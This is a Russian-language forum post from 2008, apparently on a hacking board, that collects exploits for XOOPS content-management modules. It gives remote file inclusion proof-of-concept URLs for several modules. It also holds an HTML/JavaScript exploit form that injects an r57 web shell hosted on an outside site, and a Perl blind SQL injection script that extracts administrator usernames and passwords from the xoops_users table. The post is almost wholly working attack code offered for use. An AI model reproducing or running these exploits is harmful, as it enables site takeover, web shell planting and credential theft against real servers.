23.03.2008, 15:30
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
RFI
Vulnerable: XOOPS Module XFsection
Vuln script: modify.php
PoC:
Код:
http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
Vulnerable: XOOPS Module XT-Conteudo
Vuln script: /admin/spaw/spaw_control.class.php
PHP код:
include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';
PoC:
Код:
http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]?
Vulnerable: XOOPS Module Cjay Content 3
Vuln script: /admin/editor2/spaw_control.class.php
PHP код:
include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';
Note: Register globals must be ON, and Magic Quotes must be OFF
PoC:
Код:
http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell ]?
Vulnerable: XOOPS Module icontent 1.0
Exploit:
Код HTML:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1254">
<title>XOOPS Module icontent v.1.0 Remote File Inclusion
Exploit</title>
<script language="JavaScript">
//'===============================================================================================
//'[Script Name: XOOPS Module icontent v.1.0
//'[Author : Mahmood_ali
//'[S.Page :
http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip
//'===============================================================================================
//'[[V.Code]]------------------------------------------------------
//'
//'include $spaw_root.'config/spaw_control.config.php';
//'include $spaw_root.'class/toolbars.class.php';
//'include $spaw_root.'class/lang.class.php';
//'
//'[[V.Code]]---------------------------------------------------------
//# Tryag.Com
//# ...
var path="/modules/icontent/include/wysiwyg/"
var adres="spaw_control.class.php" //File name
var acik ="?spaw_root=" // Line 15
var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell
function command(){
if (document.rfi.target1.value==""){
alert("Failed..");
return false;
}
rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
rfi.submit(); // Form Submit
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Arial" size="2"
color="#FFFFFF">XOOPS Module icontent
v.1.0 Remote File Inclusion Exploit</font></b></p>
<p></p>
<form method="post" target="getting"
name="rfi" onSubmit="command();">
<b><font face="Tahoma" size="1"
color="#FF0000">Target:</font><font
face="Tahoma" size="1"
color="#FFFF00">[http://[target]/[scriptpath]</font><font
color="#00FF00"
size="2" face="Tahoma">
</font><font color="#FF0000"
size="2"> </font></b>
<input type="text" name="target1"
size="20" style="background-color:
#808000"
onmouseover="javascript:this.style.background='#808080';"
onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Gonder"
name="B1"><input type="reset"
value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337"
width="633" scrolling="yes"
frameborder="0"></iframe>
</p>
<b><font face="Lucida Handwriting" size="5"
color="#FF0000">Mahmood_ali</font></b><p>
<b><a href="http://tryag.com/cc">
<font face="Lucida Handwriting" size="5"
color="#FFFFFF">TrYaG-Team</font></a></b></p>
</p>
</center>
</body>
</html>
Vulnerable: XOOPS Module tsdisplay4xoops 0.1
PoC:
Код:
[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell
Remote SQL Injection
Vulnerable: XOOPS Module Jobs <= 2.4
Код:
#!/usr/bin/perl
#[Script Name: XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL
Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[Dork : "inurl:/modules/jobs/"
#[S.Page : http://www.jlmzone.com/
#[$$ : Free
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$kapan = "/*";
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/modules/jobs/index.php?pa=jobsview&cid=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = <STDIN>;
chop ($id);
$target =
"-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;
#Writing data to socket
print
"+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$server", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /password:(.*?)<\/b>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit();
}
}
|
|
|